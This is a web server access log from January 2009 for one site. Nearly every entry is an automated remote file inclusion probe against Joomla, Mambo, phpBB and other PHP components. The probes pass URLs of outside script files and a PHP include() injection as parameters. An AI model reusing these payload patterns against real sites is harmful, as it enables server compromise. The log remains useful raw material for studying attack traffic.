72.82.228.83 - - [30/Jan/2009:08:06:47 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://www.hindustanlink.com/adsphoto/iddu.txt??%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.82.228.83 - - [30/Jan/2009:08:06:47 -0800] "GET /logs/access_081222.log//path/index.php?option=com_extplorer&action=show_error&dir=http://www.hindustanlink.com/adsphoto/iddu.txt??%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.82.228.83 - - [30/Jan/2009:08:06:47 -0800] "GET /logs/access_080414.log//path/index.php?option=com_extplorer&action=show_error&dir=http://www.hindustanlink.com/adsphoto/iddu.txt??%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.82.228.83 - - [30/Jan/2009:08:06:47 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://www.hindustanlink.com/adsphoto/iddu.txt??%20?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:06:48 -0800] "GET /logs/access_080618.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
70.84.182.98 - - [30/Jan/2009:08:06:52 -0800] "GET /logs/access_080602.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.onlinevine.co.uk//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:53 -0800] "GET /logs/access_081222.log//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:53 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:53 -0800] "GET /logs/access_080414.log//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:08:06:57 -0800] "GET /squirrelcart/cart_content.php?cart_isp_root=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:08:06:57 -0800] "GET /logs/access_080808.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:08:06:57 -0800] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:58 -0800] "GET /logs/access_081222.log//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:59 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:06:59 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:07:00 -0800] "GET /logs/access_080414.log//path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.183.36.251 - - [30/Jan/2009:08:07:25 -0800] "GET /logs/access_080514.log%20%20//squirrelcart/cart_content.php?cart_isp_root=http://oursoultvxq.com/shany/css/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.78.202 - - [30/Jan/2009:08:07:25 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://h1.ripway.com/sev3nfold/idomila.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:07:31 -0800] "GET /logs/access_080807.log/home.php?pagina=http://anakdompu.by.ru/bots/id/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.150.78.201 - - [30/Jan/2009:08:07:33 -0800] "GET /logs/access_080425.log%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.vust.net/contrex/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
119.235.18.7 - - [30/Jan/2009:08:07:41 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gm-immobilien.info/components/com_id/fx29id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.235.18.7 - - [30/Jan/2009:08:07:41 -0800] "GET /logs/access_081207.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gm-immobilien.info/components/com_id/fx29id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.235.18.7 - - [30/Jan/2009:08:07:41 -0800] "GET /logs/access_081113.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gm-immobilien.info/components/com_id/fx29id?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
119.235.18.7 - - [30/Jan/2009:08:07:42 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.gm-immobilien.info/components/com_id/fx29id?? HTTP/1.1" 200 95260 "-" "Mozilla/5.0" "www.dmulk.com"
119.63.202.240 - - [30/Jan/2009:08:07:46 -0800] "GET /logs/access_080505.log%20/appserv/main.php?appserv_root=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:07:50 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:07:50 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:07:50 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:08:07:53 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:08:07:53 -0800] "GET /skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.230.89.98 - - [30/Jan/2009:08:07:53 -0800] "GET /logs/access_081227.log%20//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
113.30.66.5 - - [30/Jan/2009:08:07:56 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:19 -0800] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:20 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:20 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.184.52.9 - - [30/Jan/2009:08:08:29 -0800] "GET /logs//path/index.php?option=com_extplorer&action=show_error&dir=http://lofpd.com/plugins/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.52.9 - - [30/Jan/2009:08:08:29 -0800] "GET /path/index.php?option=com_extplorer&action=show_error&dir=http://lofpd.com/plugins/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.52.9 - - [30/Jan/2009:08:08:29 -0800] "GET /logs/access_081222.log//path/index.php?option=com_extplorer&action=show_error&dir=http://lofpd.com/plugins/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.184.52.9 - - [30/Jan/2009:08:08:29 -0800] "GET /logs/access_080414.log//path/index.php?option=com_extplorer&action=show_error&dir=http://lofpd.com/plugins/crutz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:33 -0800] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:34 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:35 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95130 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:35 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95160 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95144 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:35 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:36 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:37 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95162 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:37 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:38 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:38 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95146 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:08:38 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:08:53 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:08:59 -0800] "GET /logs/access_080712.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:03 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95176 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:04 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:09:06 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:09:10 -0800] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:09:20 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.193.210.232 - - [30/Jan/2009:08:09:22 -0800] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:09:23 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:09:23 -0800] "GET /logs/access_080504.log//index.php?option=com_custompages&cpage=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:09:23 -0800] "GET /logs/access_080815.log//index.php?option=com_custompages&cpage=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.46.37.10 - - [30/Jan/2009:08:09:24 -0800] "GET /index.php?option=com_custompages&cpage=http://sunandsea.co.kr/nalog/idku.txt???? HTTP/1.1" 200 94965 "-" "libwww-perl/5.811" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:36 -0800] "GET /logs/access_080501.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:37 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95162 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:38 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:09:42 -0800] "GET /logs/access_080828.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:09:57 -0800] "GET /logs/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:09:57 -0800] "GET /component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:09:57 -0800] "GET /logs/access_080529.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:09:59 -0800] "GET /logs/access_080511.log/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:09:59 -0800] "GET /senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:10:00 -0800] "GET /logs/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.10.164.34 - - [30/Jan/2009:08:10:02 -0800] "GET /logs/access_080808.log/component/option,com_uhp/Itemid,45//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://drcauto.com/ubbthreads/ID1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:08:10:06 -0800] "GET /logs/access_080513.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.184.172 - - [30/Jan/2009:08:10:21 -0800] "GET /logs/access_080617.log HTTP/1.1" 200 2711267 "http://www.dmulk.com/logs/access_080617.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.111.184.172 - - [30/Jan/2009:08:10:24 -0800] "GET /logs/access_080618.log HTTP/1.1" 200 2424375 "http://www.dmulk.com/logs/access_080618.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
85.153.2.57 - - [30/Jan/2009:08:10:28 -0800] "GET /logs/access_080409.log/senetman/html/index.php?page=http://madrigaldelavera.es/joomla/mambots/editors/tukulid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:08:10:28 -0800] "GET /logs/index.php?acao=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:08:10:28 -0800] "GET /index.php?acao=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 200 94691 "-" "libwww-perl/5.822" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:10:29 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:10:29 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:08:10:30 -0800] "GET /logs/access_080824.log/index.php?acao=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:10:42 -0800] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:10:49 -0800] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:11:03 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:11:13 -0800] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:11:13 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95153 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:11:14 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:11:14 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:11:14 -0800] "GET /logs/access_080116.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.136.61.17 - - [30/Jan/2009:08:11:14 -0800] "GET /logs/access_071129.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mixcom.ru/pic/banner.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:08:11:15 -0800] "GET /logs/access_080501.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:08:11:16 -0800] "GET /skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:08:11:16 -0800] "GET /logs/access_081227.log%20//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.126.12.7 - - [30/Jan/2009:08:11:16 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://geocities.com/kombinasi2000/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:11:23 -0800] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:08:11:25 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.99 - - [30/Jan/2009:08:11:25 -0800] "GET /config/dbutil.bck.php?confdir=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.199.57.35 - - [30/Jan/2009:08:11:32 -0800] "GET /logs/access_080727.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://w1p2.com/tiny_includes/smarty/plugins/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
